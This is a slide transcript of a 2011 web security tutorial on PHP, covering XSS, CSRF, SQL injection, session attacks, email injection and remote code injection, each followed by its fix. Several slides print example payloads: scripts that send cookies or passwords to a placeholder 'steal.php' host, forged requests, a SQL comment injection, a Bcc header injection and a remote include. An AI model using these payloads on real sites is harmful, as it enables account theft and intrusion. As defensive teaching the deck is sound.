Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Evolution of Web Security

Chris Shiflett
September 26, 2011
Programming
10
1.2k

Evolution of Web Security

This is a multi-faceted tutorial that explores new concepts in web security. After a solid grounding in well-known exploits like cross-site scripting (XSS) and cross-site request forgeries (CSRF), I demonstrate how traditional exploits are being combined together and with other technologies like Ajax to launch sophisticated attacks that penetrate firewalls, target users, and spread like worms. I then discuss some ideas for the future, such as evaluating trends to identify suspicious activity and understanding human tendencies and behavior to help provide a better, more secure user experience.

Chris Shiflett

September 26, 2011
Tweet

More Decks by Chris Shiflett

See All by Chris Shiflett
Understanding People
shiflett
2
2.2k

Other Decks in Programming

See All in Programming
A JVM Threading Model for the containerized times
lhespanha
0
730
pnpm workspace実践ノウハウ
mh4gf
8
960
Kotlinハイパフォーマンスプログラミング
ohmae
4
2.5k
Your Code Can be Poetry Too
jrf
0
130
Flutterにおけるアプリ内課金実装 -Android/iOS完全なる統一 -
nacatl
1
690
Jetpack Media3로 좋은 콘텐츠 소비 경험 구현하기
workspace93
0
110
わかる!Hashicorp Waypoint | HashiTalks: Japan2023
kazue
0
280
ruby.wasmでブラウザを酷使してみよう / 2023-MatsueRubyKaigi
lnit
0
100
認知負荷で考えるフロントエンドの組織体制
shibe23
0
440
Creative coding starting with Ruby
chobishiba
1
600
neovimで作る最新Ruby開発環境2023
joker1007
2
1.1k
Value and Record Types
hschwentner
0
720

Featured

See All Featured
The Web Native Designer (August 2011)
paulrobertlloyd
78
2.6k
Teambox: Starting and Learning
jrom
125
8.1k
Distributed Sagas: A Protocol for Coordinating Microservices
caitiem20
318
20k
XXLCSS - How to scale CSS and keep your sanity
sugarenia
239
1.2M
GraphQLの誤解/rethinking-graphql
sonatard
44
8.5k
5 minutes of I Can Smell Your CMS
philhawksworth
199
19k
Six Lessons from altMBA
skipperchong
17
2.6k
Why You Should Never Use an ORM
jnunemaker
PRO
49
8.2k
Facilitating Awesome Meetings
lara
37
5.1k
What's in a price? How to price your products and services
michaelherold
236
10k
CoffeeScript is Beautiful & I Never Want to Write Plain JavaScript Again
sstephenson
152
14k
Bash Introduction
62gerente
603
210k

Transcript

  1. Evolution of
    Web Security
    Chris Shiflett
    @shiflett ▪ shiflett.org

    View Slide

  2. Who am I?
    Web craftsman from Brooklyn, NY, and
    founding member of Analog, a web design
    & development co-operative.

    View Slide

  3. 1. Fundamentals

    View Slide

  4. Defense in depth
    — Redundant safeguards are valuable.
    Least privilege
    — Grant as little freedom as possible.
    Least complicated
    — Complexity breeds mistakes.
    Three Principles

    View Slide

  5. Filter input.
    — Ensure data coming in is valid.
    Escape output.
    — Ensure data going out is not misinterpreted.
    Two Practices

    View Slide

  6. Application Escape
    Filter
    Filter input. Escape output.

    View Slide

  7. $clean = array();
    if (ctype_alpha($_POST['name'])) {
    $clean['name'] = $_POST['name'];
    } else {
    /* Error */
    }
    ?>

    View Slide

  8. $clean = array();
    switch ($_POST['color']) {
    case 'red':
    case 'green':
    case 'blue':
    $clean['color'] = $_POST['color'];
    break;
    default:
    /* Error */
    break;
    }
    ?>

    View Slide

  9. $clean = array();
    $colors = array('red', 'green', 'blue');
    if (in_array($_POST['color'], $colors)) {
    $clean['color'] = $_POST['color'];
    } else {
    /* Error */
    }
    ?>

    View Slide

  10. $clean = array();
    $colors = array();
    $colors['red'] = '';
    $colors['green'] = '';
    $colors['blue'] = '';
    if (isset($colors[$_POST['color']])) {
    $clean['color'] = $_POST['color'];
    } else {
    /* Error */
    }
    ?>

    View Slide

  11. $clean = array();
    if (preg_match('/^\d{5}$/',
    $_POST['zip'])) {
    $clean['zip'] = $_POST['zip'];
    } else {
    /* Error */
    }
    ?>

    View Slide

  12. /* Content-Type: text/html; charset=UTF-8' */
    $html = array();
    $html['user'] = htmlentities($clean['user'],
    ENT_QUOTES,
    'UTF-8');
    echo "Welcome, {$html['user']}.";
    ?>

    View Slide

  13. View Slide

  14. Cross-Site
    Scripting
    Cross-Site
    Request
    Forgeries
    SQL Injection
    Session Fixation
    Session
    Hijacking
    Email Injection
    Remote Code
    Injection
    Exploits

    View Slide

  15. Victim
    Attacker
    Cross-Site Scripting
    Target
    XSS
    HTML
    XSS
    1 2

    View Slide

  16. echo $_GET['user'];
    http://host/foo.php?user=%3Cscript%3E…
    echo '…';<br/>

    View Slide

  17. <br/>document.location =<br/>'http://host/steal.php?cookies=' +<br/>encodeURI(document.cookie);<br/>
    Steal Cookies

    View Slide

  18. <br/>document.forms[0].action =<br/>'http://host/steal.php';<br/>
    Steal Passwords

    View Slide


  19. style="display: none" />
    style="display: none" />


    Steal Saved Passwords

    View Slide


  20. Short & Simple

    View Slide

  21. $string = "alert('XSS');";
    $string = mb_convert_encoding($string, 'UTF-7');
    echo htmlentities($string);
    Character Encoding
    Google XSS Example
    http://shiflett.org/blog/2005/dec/google-xss-example

    View Slide

  22. FIEO.
    Use valid HTML.
    — http://validator.w3.org/
    Use existing solutions.
    — PHP developers, use htmlentities() or htmlspecialchars().
    — Make sure you indicate the character encoding!
    Need to allow HTML?
    — Use HTML Purifier, even if you’re not using PHP:
    http://htmlpurifier.org/
    Stop It!

    View Slide

  23. Target
    Attacker
    Cross-Site Request Forgeries
    Victim
    ? CSRF
    1 2

    View Slide

  24. Because the attack is carried out by
    the victim, CSRF can bypass:
    — HTTP auth
    — Session-based auth
    — Firewalls
    — &c.
    CSRF

    View Slide

  25. Buy

    value="059600656X" />


    POST /buy.php HTTP/1.1
    Host: host
    Cookie: PHPSESSID=1234
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 15
    isbn=059600656X

    View Slide

  26. Forging GET
    GET /buy.php?isbn=059600656X HTTP/1.1
    Host: host
    Cookie: PHPSESSID=1234

    View Slide





  27. document.buy.submit();
    Forging POST
    POST /buy.php HTTP/1.1
    Host: host
    Cookie: PHPSESSID=1234
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 15
    isbn=059600656X

    View Slide

  28. Digg (Fixed)
    http://4diggers.blogspot.com/
    Amazon (Fixed?)
    http://shiflett.org/amazon.php
    CSRF Exploits

    View Slide

  29. <br/>new Image().src =<br/>'http://host/steal.php?cookies=' +<br/>encodeURI(document.cookie);<br/>
    Steal Cookies (Improved)

    View Slide

  30. $token = md5(uniqid(rand(), TRUE));
    $_SESSION['token'] = $token;
    $html['token'] = htmlentities($token, ENT_QUOTES,
    'UTF-8');
    Stop It!
    name="token"
    value="" />

    View Slide

  31. Database
    Attacker
    SQL Injection
    Target
    SQL
    SQL
    SQL
    1 2

    View Slide

  32. SELECT count(*)
    FROM users
    WHERE username = '{$_POST['username']}'
    AND password = '…'
    chris' /*
    SELECT count(*)
    FROM users
    WHERE username = 'chris' /*'
    AND password = '…'

    View Slide

  33. FIEO.
    Use prepared statements.
    — PHP developers, use PDO.
    Stop It!
    addslashes() Versus mysql_real_escape_string()
    http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string

    View Slide

  34. http://host/login.php?PHPSESSID=1234
    Session Fixation

    View Slide

  35. Regenerate the session identifier.
    — PHP developers, session_regenerate_id(TRUE).
    Do this whenever the privilege level
    changes.
    Stop It!

    View Slide

  36. Attacker impersonates a victim.
    In PHP, by default, only requires a valid
    session identifier.
    Session identifier obtained using:
    — Prediction
    — Capture
    — Fixation
    Session Hijacking

    View Slide

  37. Understand how sessions work.
    Minimize session identifier exposure.
    — SSL
    — Separate domain for embedded resources
    Trending
    — https://panopticlick.eff.org/
    — More on this later…
    Stop It!

    View Slide

  38. [email protected]\r\nBcc: [email protected]\r\nBcc: …
    To: [email protected]
    Subject: Feedback
    From: [email protected]
    Bcc: [email protected]
    Bcc: …
    Email Injection
    mail('[email protected]', 'Feedback', '...',
    "From: {$_POST['email']}");

    View Slide

  39. FIEO.
    — http://iamcal.com/publish/articles/php/parsing_email
    — PHP developers, use ctype_print() as defense in depth.
    Stop It!

    View Slide

  40. Target
    Attacker
    Remote Code Injection

    View Slide

  41. include "{$_COOKIE['type']}.php";
    Cookie: type=http://host/inject.inc?
    include "http://host/inject.inc?.php";

    View Slide

  42. This example exploits allow_url_fopen.
    PHP 5 has allow_url_include.
    — By default, allow_url_include is disabled.
    Remote Code Injection

    View Slide

  43. include "php://input";
    POST /script.php?type=php://input%00 HTTP/1.1
    Host: host
    Content-Type: application/x-www-form-urlencoded
    Content-Length: ?
    ?
    include "{$_GET['type']}.php";

    View Slide

  44. FIEO.
    — If at all possible, use a white list.
    Stop It!

    View Slide

  45. 2. Emerging Trends

    View Slide

  46. Ajax
    “The name is shorthand for Asynchronous
    JavaScript + XML, and it represents a
    fundamental shift in what’s possible on
    the Web.”
    — Jesse James Garrett

    View Slide

  47. Ajax
    “Client-side techniques & technologies
    that allow two-way communication
    between the client and the server without
    reloading the page.”

    View Slide

  48. Target
    Victim
    JS
    1. XMLHttpRequest
    2. HTML form + victim’s token
    3. XMLHttpRequest + victim’s token
    Cross-Domain Ajax

    View Slide

  49. Target
    Victim
    XSS + Ajax + CSRF
    XSS
    1. XMLHttpRequest
    2. HTML form + victim’s token
    3. XMLHttpRequest + victim’s token

    View Slide

  50. XSS is a perfect platform for CSRF.
    CSRF attacks can exploit XSS
    vulnerabilities.
    Victims can become attackers.
    Rinse. Repeat.
    Worms

    View Slide

  51. Browser Hijacking
    http://shiflett.org/blog/2006/oct/using-csrf-for-browser-hijacking
    Myspace CSRF and XSS Worm (Samy)
    http://shiflett.org/blog/2005/oct/myspace-csrf-and-xss-worm-samy

    View Slide




  52. Cross-Domain Ajax
    Thanks, Flash!

    View Slide

  53. Cross-Domain Ajax
    domain="*" API domain Vulnerable?
    No yahoo.com No
    No youtube.com No
    Yes api.flickr.com No
    Yes No adobe.com Yes No

    View Slide

  54. Target
    Attacker
    JavaScript Hijacking
    Victim
    ? CSRF
    1 2
    3
    4

    View Slide


  55. [{"email": "[email protected]"}]
    JavaScript Hijacking Demo
    http://mochikit.com/fortify_fud/

    View Slide

  56. JavaScript Hijacking
    “If you audit your application for CSRF
    flaws, you’ve defeated this attack.
    Moreover, the well-known, pre-existing
    exploits for CSRF are actually worse than
    this attack.”
    — Thomas Ptacek

    View Slide

  57. 3. Ideas for the Future

    View Slide

  58. Panopticlick
    https://panopticlick.eff.org/
    Trending
    “When you visit a web site, you are
    allowing that site to access a lot of
    information about your computer’s
    configuration. Combined, this information
    can create a kind of fingerprint — a
    signature that could be used to identify
    you and your computer.”

    View Slide

  59. Trending
    “Not the intent, but Panopticlick from @eff
    would be useful for preventing session
    hijacking.”
    — http://twitter.com/shiflett/status/8562663352

    View Slide

  60. Establish trends to help detect
    anomalies.
    Trends can be based on identity or
    behavior.
    Trending is imperfect; use as defense in
    depth.
    Trending

    View Slide

  61. Slides
    http://shiflett.org/evolution-of-web-security.pdf
    http://slideshare.net/shiflett

    View Slide

  62. Follow me on Twitter.
    — @shiflett
    Comment on my blog.
    — shiflett.org
    Email me.
    — chris@shiflett.org
    Work with me.
    — analog.coop
    Feedback?

    View Slide